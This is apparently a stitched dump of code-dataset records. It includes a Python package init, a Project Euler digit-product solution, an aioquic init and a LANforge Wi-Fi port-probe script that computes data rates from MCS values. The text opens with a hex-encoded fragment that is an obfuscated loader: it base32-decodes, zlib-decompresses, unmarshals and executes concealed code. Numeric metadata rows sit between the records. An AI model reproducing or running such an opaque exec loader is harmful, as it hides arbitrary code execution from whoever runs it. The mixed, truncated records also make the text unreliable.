4C4E534B5236424557423444574C575837534F4F3645334A5255365141444E483433433536424135483457415A4B564E564641424534594159444E57563234354E345734375233423647544A49325848434A5949484F4F4735423534414E4246595946443542374152534A5349374543374A444C55484A3233595642334D43555841434E4456484C55455A54523532545656435037454E4B4A4C34444C554148554C46505A503541465541473242583758424F4A4834473749344A32354C3659554F494A36564C3642434549365835374234465A454B474B584C4234565A4550345358344842574C58334C46475A34483358514D5A424B47583441595048335A5559495351424C4E37485634493549475A585A494B56575A554B53354B505356464C51434859354A414143424148374D42334F4F334E5A4C5A58524656584C5151585143564F47504F374132434A4E4D514A53443249485553444D513753414359425659445533583748514C5556324E3341374F493544333644594652584949524C4B35434F59524A4D36524935584854564853544253374C584348484C4E4F4E45375537475744584834574F4B344A374D55505235474459455936544E374747364C55585342324252344758464D574D58443744424F415A53564350484D5A5A5A5055514A50554554564345555745524C3245553443494F544751344234364432474B5046494352443253364156564B47474E364C59424A365A42584545505257564853454C51504A4A36444D4532543357474142584D374136554244375A4549443737544552335A5A564555413634575259514C335548364B584C484B564F56435741424E4847354D565151333335495650535A35454D4356343248354D4C48574A5543474A4F35564333364247584F583657434E554B53523553475444365153454F34514E4C51574B51454759424A4450594C5041435344374E564C32494A414E373432414B3358495654414D4C5058354D505A374447344E5246514347414B474E493358434733344852544E464C334A374344534F334B4F3248564C594C4F4244444A3349343241504554474832324737435033475A36354C4E374C595258424E344B565943363250334A55375A5A494B365055375036363258574B4C36514D3243543650464634445A533342364A4944345248415A5551563451424C334B4753595455334A4E5946333445434B335637445035345A4858544454423744555452544B4C37514C5A364C425736364B3548514D555648454F43504D50424749485A4D443644505554565448354151454257574246503448453546595A4241345A56553450445849525753584F4E4F33524C554B534E4355485A4A57454A505A4435354B344F36564259425745445A45415551475435553535324F334C56444B43574E51424D573659555337574954434A344950465552455241344B424245364756544954374E344A414F45365856594E474642343452474436493253494C4B473445455453423232534D5737485834344F5159335548344E4E3749594750573355453553434C4B484C32574857443359474150504C59485057355745445147444D414159364253504955514948494B435746454956514A3749594A4C475053553245583758425434344B42333558433445465145485A554152364C5646485A4F4934374959594C474B564E564355485858555832424859464435374550454537445946585A4F44594547374C595441465137354E525256595835415058465A4D50485135354B344F414E545335445535325A4B494E494E584F5758564435414444344655364448514E4C4237484E47335941484E495643515A44344F44544B554748415149435244524349324447454D424E5A47424A514941534C595248423633494350345032495543575A5649484E5A554C57524532484F4847444335513536465A4832554F47425A5553475544574D53594C4E443736414D34435750555134344E51364648354451365A425A494642455A4B4756364D4B4654433451365A46464C5A34435253584F593455505857593752424956505346434A5736594A5342454535555455344946534A4A4A52544E42464146335347563659464A3246515A4E455247434B3734425A465A4559354A4A47434954514D5745444C4D4C554F574E444A35504656574254365154534E3348473457474D33524F3545555435374950333436504C4D58443342344454544146454C4D3243543756355947334B4F5854324B5A35595233353348544D515745324232504E355550424F365751495A57494D474D4654475254484556374C564636454A425A524D4F324E51344941573450343433355733484937345033495841574D41583752444741364E55514F453642334E47324E354C594E585A4857424C3736564B48434F525537424D574632344843424F4B4D4A4244444A52334E4F33453648483459534750465850524C494F514342364E345737503449524333574F57474258464B5A425948494B4557515041585242583746554B5836353632544842573435594A554836455252454C58553634454237344C4A5247594C4A50545A4F573234443245344C5735535155583350594755484858594D5A425A584C584A4A37464C4F4E573458594D4F444D41584A57443559343642324B50434253354C5A355A334A41554549494B5446554A524B4D444B3443523655534B5A47554654555546474D4656474D524F584F584252594D4E58544C4E34594C50474333574636525834594C5A324D54474C3454373754445A464A553D3D3D3D3D3D295C7830375C7864615C7830347A6C69625C7864615C7830366261736536345C7864615C7830376D61727368616C5C7864615C783034657865635C7864615C7830356C6F6164735C7864615C6E6465636F6D70726573735C7864615C746233326465636F64655C7861395C783030725C745C7830305C7830305C783030725C745C7830305C7830305C7830305C7866615C7830333C723E5C7864615C7830383C6D6F64756C653E5C7830335C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7831385C783031272929'))
| 1,946
| 9,628
| 0.996814
| 18
| 9,730
| 538.833333
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.8772
| 0.001542
| 9,730
| 5
| 9,628
| 1,946
| 0.121153
| 0.006372
| 0
| 0
| 0
| 0
| 0.993379
| 0.993379
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
b3d30f2af623633cbe1b661773a447476d4f398b
| 101
|
py
|
Python
|
spatialclique/__init__.py
|
pjhartzell/spatial-clique
|
ecd7f95e182ee1e4f6ff7b47390a85500ec79815
|
[
"MIT"
] | null | null | null |
spatialclique/__init__.py
|
pjhartzell/spatial-clique
|
ecd7f95e182ee1e4f6ff7b47390a85500ec79815
|
[
"MIT"
] | null | null | null |
spatialclique/__init__.py
|
pjhartzell/spatial-clique
|
ecd7f95e182ee1e4f6ff7b47390a85500ec79815
|
[
"MIT"
] | null | null | null |
from .spatialclique import mc_hard, mc_soft
from .spatialclique import hard_adjacency, soft_adjacency
| 50.5
| 57
| 0.871287
| 14
| 101
| 6
| 0.5
| 0.404762
| 0.547619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089109
| 101
| 2
| 57
| 50.5
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3ec5ad6dec0082400cde7690b71ea6bd995c520
| 2,845
|
py
|
Python
|
1-99/t8.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t8.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t8.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
# The four adjacent digits in the 1000-digit number that have the greatest product are 9 x 9 x 8 x 9 = 5832.
#
# 73167176531330624919225119674426574742355349194934
# 96983520312774506326239578318016984801869478851843
# 85861560789112949495459501737958331952853208805511
# 12540698747158523863050715693290963295227443043557
# 66896648950445244523161731856403098711121722383113
# 62229893423380308135336276614282806444486645238749
# 30358907296290491560440772390713810515859307960866
# 70172427121883998797908792274921901699720888093776
# 65727333001053367881220235421809751254540594752243
# 52584907711670556013604839586446706324415722155397
# 53697817977846174064955149290862569321978468622482
# 83972241375657056057490261407972968652414535100474
# 82166370484403199890008895243450658541227588666881
# 16427171479924442928230863465674813919123162824586
# 17866458359124566529476545682848912883142607690042
# 24219022671055626321111109370544217506941658960408
# 07198403850962455444362981230987879927244284909188
# 84580156166097919133875499200524063689912560717606
# 05886116467109405077541002256983155200055935729725
# 71636269561882670428252483600823257530420752963450
# Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
def parse_data():
number = """
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
"""
return [int(x) - int('0') for x in list(number.replace('\n', ''))]
def get_greater_serial_product(numbers, serial):
limit = len(numbers) - serial + 1
serial_value = [1] * limit
for i in xrange(0, limit):
for j in xrange(i, i + serial):
serial_value[i] = serial_value[i] * numbers[j]
return max(serial_value)
def main():
data = parse_data()
print get_greater_serial_product(parse_data(), 13)
if __name__ == '__main__':
main()
| 40.642857
| 127
| 0.879086
| 159
| 2,845
| 15.597484
| 0.440252
| 0.017742
| 0.012903
| 0.015323
| 0.854839
| 0.854839
| 0.854839
| 0.854839
| 0.854839
| 0.854839
| 0
| 0.774713
| 0.082601
| 2,845
| 69
| 128
| 41.231884
| 0.175479
| 0.44007
| 0
| 0
| 0
| 0
| 0.657744
| 0.637349
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.027778
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
376ec68a5ad5a0129d4beb0c8cd24ff819030e95
| 138
|
py
|
Python
|
src/aioquic/asyncio/__init__.py
|
siliconcupcake/aioquic
|
86289665a8ee71dd930815de2f4e9db73a98f166
|
[
"BSD-3-Clause"
] | null | null | null |
src/aioquic/asyncio/__init__.py
|
siliconcupcake/aioquic
|
86289665a8ee71dd930815de2f4e9db73a98f166
|
[
"BSD-3-Clause"
] | null | null | null |
src/aioquic/asyncio/__init__.py
|
siliconcupcake/aioquic
|
86289665a8ee71dd930815de2f4e9db73a98f166
|
[
"BSD-3-Clause"
] | null | null | null |
from .quic.client import connect # noqa
from .quic.protocol import QuicConnectionProtocol # noqa
from .quic.server import serve # noqa
| 34.5
| 57
| 0.782609
| 18
| 138
| 6
| 0.555556
| 0.222222
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 138
| 3
| 58
| 46
| 0.923077
| 0.101449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
378a85cc5c9eb1b5c7dc732e153ed85a81a384dc
| 31,089
|
py
|
Python
|
py-json/port_probe.py
|
MynaITLabs/lanforge-scripts
|
c905e2a12662f0e3304f0ac29b509c95f09983ce
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | 1
|
2020-12-10T18:46:54.000Z
|
2020-12-10T18:46:54.000Z
|
py-json/port_probe.py
|
MynaITLabs/lanforge-scripts
|
c905e2a12662f0e3304f0ac29b509c95f09983ce
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-json/port_probe.py
|
MynaITLabs/lanforge-scripts
|
c905e2a12662f0e3304f0ac29b509c95f09983ce
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import importlib
from time import sleep
# import pandas as pd
import sys
import os
from pprint import pprint
sys.path.append(os.path.join(os.path.abspath(__file__ + "../../../")))
lfcli_base = importlib.import_module("py-json.LANforge.lfcli_base")
LFCliBase = lfcli_base.LFCliBase
# Probe data can change frequently. It is recommended to update
class ProbePort(LFCliBase):
def __init__(self,
lfhost=None,
lfport='8080',
debug=False,
eid_str=None):
super().__init__(_lfjson_host=lfhost,
_lfjson_port=lfport,
_debug=debug)
hunks = eid_str.split(".")
self.eid_str = eid_str
self.probepath = "/probe/1/%s/%s" % (hunks[-2], hunks[-1])
self.response = None
self.signals = None
self.ofdma = False
self.tx_bitrate = None
self.tx_mcs = None
self.tx_nss = None
self.tx_mbit = None
self.tx_mhz = None
self.tx_gi = None
self.tx_duration = None
self.tx_mbit_calc = None
self.tx_data_rate_gi_short_Mbps = None
self.tx_data_rate_gi_long_Mbps = None
self.rx_bitrate = None
self.rx_mcs = None
self.rx_nss = None
self.rx_mbit = None
self.rx_mhz = None
self.rx_gi = None
self.rx_duration = None
self.rx_mbit_calc = None
self.rx_data_rate_gi_short_Mbps = None
self.rx_data_rate_gi_long_Mbps = None
self.data_rate = None
# folder = os.path.dirname(__file__)
def refreshProbe(self):
self.json_post(self.probepath, {})
sleep(0.2)
response = self.json_get(self.probepath)
self.response = response
if self.debug:
print("probepath (eid): {probepath}".format(probepath=self.probepath))
pprint("Probe response: {response}".format(response=self.response))
text = self.response['probe-results'][0][self.eid_str]['probe results'].split('\n')
signals = [x.strip('\t').split('\t') for x in text if 'signal' in x]
keys = [x[0].strip(' ').strip(':') for x in signals]
values = [x[1].strip('dBm').strip(' ') for x in signals]
# if self.debug:
print("signals keys: {keys}".format(keys=keys))
print("signals values: {values}".format(values=values))
self.signals = dict(zip(keys, values))
tx_bitrate = [x for x in text if 'tx bitrate' in x][0].replace('\t', ' ')
# if 'HE' in tx_bitrate:
# print("HE not supported ")
print("tx_bitrate {tx_bitrate}".format(tx_bitrate=tx_bitrate))
self.tx_bitrate = tx_bitrate.split(':')[-1].strip(' ')
if 'MHz' in tx_bitrate:
self.tx_mhz = [x.strip('\t') for x in text if 'tx bitrate' in x][0].split('MHz')[0].rsplit(' ')[-1].strip(
' ')
print("tx_mhz {tx_mhz}".format(tx_mhz=self.tx_mhz))
else:
self.tx_mhz = 20
print("HT: tx_mhz {tx_mhz}".format(tx_mhz=self.tx_mhz))
tx_mcs = [x.strip('\t') for x in text if 'tx bitrate' in x][0].split(':')[1].strip('\t')
if 'MCS' in tx_mcs:
self.tx_mcs = int(tx_mcs.split('MCS')[1].strip(' ').split(' ')[0])
print("self.tx_mcs {tx_mcs}".format(tx_mcs=self.tx_mcs))
if 'NSS' in text:
self.tx_nss = [x.strip('\t') for x in text if 'tx bitrate' in x][0].split('NSS')[1].strip(' ')
else:
# nss is not present need to derive from MCS for HT
if 0 <= self.tx_mcs <= 7:
self.tx_nss = 1
elif 8 <= self.tx_mcs <= 15:
self.tx_nss = 2
elif 16 <= self.tx_mcs <= 23:
self.tx_nss = 3
elif 24 <= self.tx_mcs <= 31:
self.tx_nss = 4
print("tx_nss {tx_nss}".format(tx_nss=self.tx_nss))
self.tx_mbit = float(self.tx_bitrate.split(' ')[0])
print("tx_mbit {tx_mbit}".format(tx_mbit=self.tx_mbit))
if 'HE' in tx_bitrate:
self.calculated_data_rate_tx_HE()
elif 'VHT' in tx_bitrate:
self.calculated_data_rate_tx_VHT()
else:
self.calculated_data_rate_tx_HT()
else:
print("No tx MCS value:{tx_bitrate}".format(tx_bitrate=tx_bitrate))
rx_bitrate = [x for x in text if 'rx bitrate' in x][0].replace('\t', ' ')
print("rx_bitrate {rx_bitrate}".format(rx_bitrate=rx_bitrate))
self.rx_bitrate = rx_bitrate.split(':')[-1].strip(' ')
print("self.rx_bitrate {rx_bitrate}".format(rx_bitrate=self.rx_bitrate))
# rx will received : 6Mbps encoding is legacy frame
# for 24g - MHz is 20
# try:
if 'MHz' in rx_bitrate:
self.rx_mhz = [x.strip('\t') for x in text if 'rx bitrate' in x][0].split('MHz')[0].rsplit(' ')[
-1].strip(' ')
print("rx_mhz {rx_mhz}".format(rx_mhz=self.rx_mhz))
else:
self.rx_mhz = 20
rx_mcs = [x.strip('\t') for x in text if 'rx bitrate' in x][0].split(':')[1].strip('\t')
# MCS is not in the 6.0MBit/s frame
if 'MCS' in rx_mcs:
self.rx_mcs = int(rx_mcs.split('MCS')[1].strip(' ').split(' ')[0])
print("self.rx_mcs {rx_mcs}".format(rx_mcs=self.rx_mcs))
if 'NSS' in text:
self.rx_nss = [x.strip('\t') for x in text if 'rx bitrate' in x][0].split('NSS')[1].strip(' ')
else:
# nss is not present need to derive from MCS for HT
if 0 <= self.rx_mcs <= 7:
self.rx_nss = 1
elif 8 <= self.rx_mcs <= 15:
self.rx_nss = 2
elif 16 <= self.rx_mcs <= 23:
self.rx_nss = 3
elif 24 <= self.rx_mcs <= 31:
self.rx_nss = 4
self.rx_mbit = self.rx_bitrate.split(' ')[0]
print("rx_nss {rx_nss}".format(rx_nss=self.rx_nss))
self.rx_mbit = float(self.rx_bitrate.split(' ')[0])
print("rx_mbit {rx_mbit}".format(rx_mbit=self.rx_mbit))
if 'HE' in rx_bitrate:
self.calculated_data_rate_rx_HE()
elif 'VHT' in rx_bitrate:
self.calculated_data_rate_rx_VHT()
else:
self.calculated_data_rate_rx_HT()
else:
print("No rx MCS value:{rx_bitrate}".format(rx_bitrate=rx_bitrate))
def getSignalAvgCombined(self):
return self.signals['signal avg'].split(' ')[0]
def getSignalAvgPerChain(self):
return ' '.join(self.signals['signal avg'].split(' ')[1:])
def getSignalCombined(self):
return self.signals['signal'].split(' ')[0]
def getSignalPerChain(self):
return ' '.join(self.signals['signal'].split(' ')[1:])
def getBeaconSignalAvg(self):
return ' '.join(self.signals['beacon signal avg']).replace(' ', '')
def calculated_data_rate_tx_HT(self):
print("calculated_data_rate_tx_HT")
# TODO compare with standard for 40 MHz if values change
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.tx_mhz)
print("Mhz {Mhz}".format(Mhz=self.tx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.tx_mhz = 20
# NSS
N_ss = self.tx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.tx_mcs == 0 or self.tx_mcs == 8 or self.tx_mcs == 16 or self.tx_mcs == 24:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.tx_mcs == 1 or self.tx_mcs == 9 or self.tx_mcs == 17 or self.tx_mcs == 25:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.tx_mcs == 2 or self.tx_mcs == 10 or self.tx_mcs == 18 or self.tx_mcs == 26:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.tx_mcs == 3 or self.tx_mcs == 11 or self.tx_mcs == 19 or self.tx_mcs == 27:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.tx_mcs == 4 or self.tx_mcs == 12 or self.tx_mcs == 20 or self.tx_mcs == 28:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.tx_mcs == 5 or self.tx_mcs == 13 or self.tx_mcs == 21 or self.tx_mcs == 29:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.tx_mcs == 6 or self.tx_mcs == 14 or self.tx_mcs == 22 or self.tx_mcs == 30:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.tx_mcs == 7 or self.tx_mcs == 15 or self.tx_mcs == 23 or self.tx_mcs == 31:
R = 5 / 6
N_bpscs = 6
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.tx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("tx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.tx_data_rate_gi_short_Mbps))
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.tx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("data_rate gi_long {data_rate} Mbps".format(data_rate=self.tx_data_rate_gi_long_Mbps))
if abs(self.tx_mbit - self.tx_data_rate_gi_short_Mbps) <= abs(self.tx_mbit - self.tx_data_rate_gi_long_Mbps):
self.tx_mbit_calc = self.tx_data_rate_gi_short_Mbps
self.tx_gi = T_gi_short
else:
self.tx_mbit_calc = self.tx_data_rate_gi_long_Mbps
self.tx_gi = T_gi_long
def calculated_data_rate_rx_HT(self):
print("calculated_data_rate_rx_HT")
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.rx_mhz)
print("Mhz {Mhz}".format(Mhz=self.rx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.rx_mhz = 20
# NSS
N_ss = self.rx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.rx_mcs == 0 or self.rx_mcs == 8 or self.rx_mcs == 16 or self.rx_mcs == 24:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.rx_mcs == 1 or self.rx_mcs == 9 or self.rx_mcs == 17 or self.rx_mcs == 25:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.rx_mcs == 2 or self.rx_mcs == 10 or self.rx_mcs == 18 or self.rx_mcs == 26:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.rx_mcs == 3 or self.rx_mcs == 11 or self.rx_mcs == 19 or self.rx_mcs == 27:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.rx_mcs == 4 or self.rx_mcs == 12 or self.rx_mcs == 20 or self.rx_mcs == 28:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.rx_mcs == 5 or self.rx_mcs == 13 or self.rx_mcs == 21 or self.rx_mcs == 29:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.rx_mcs == 6 or self.rx_mcs == 14 or self.rx_mcs == 22 or self.rx_mcs == 30:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.rx_mcs == 7 or self.rx_mcs == 15 or self.rx_mcs == 23 or self.rx_mcs == 31:
R = 5 / 6
N_bpscs = 6
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.rx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("rx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.rx_data_rate_gi_short_Mbps))
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.rx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("rx_data_rate gi_long {data_rate} Mbps".format(data_rate=self.rx_data_rate_gi_long_Mbps))
if abs(self.rx_mbit - self.rx_data_rate_gi_short_Mbps) <= abs(
self.rx_mbit - self.rx_data_rate_gi_long_Mbps):
self.rx_mbit_calc = self.rx_data_rate_gi_short_Mbps
self.rx_gi = T_gi_short
else:
self.rx_mbit_calc = self.rx_data_rate_gi_long_Mbps
self.rx_gi = T_gi_long
def calculated_data_rate_tx_VHT(self):
print("calculated_data_rate_tx_VHT")
# TODO compare with standard for 40 MHz if values change
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.tx_mhz)
print("Mhz {Mhz}".format(Mhz=self.tx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.tx_mhz = 20
# NSS
N_ss = self.tx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.tx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.tx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.tx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.tx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.tx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.tx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.tx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.tx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.tx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.tx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.tx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("tx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.tx_data_rate_gi_short_Mbps))
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.tx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("data_rate gi_long {data_rate} Mbps".format(data_rate=self.tx_data_rate_gi_long_Mbps))
if abs(self.tx_mbit - self.tx_data_rate_gi_short_Mbps) <= abs(self.tx_mbit - self.tx_data_rate_gi_long_Mbps):
self.tx_mbit_calc = self.tx_data_rate_gi_short_Mbps
self.tx_gi = T_gi_short
else:
self.tx_mbit_calc = self.tx_data_rate_gi_long_Mbps
self.tx_gi = T_gi_long
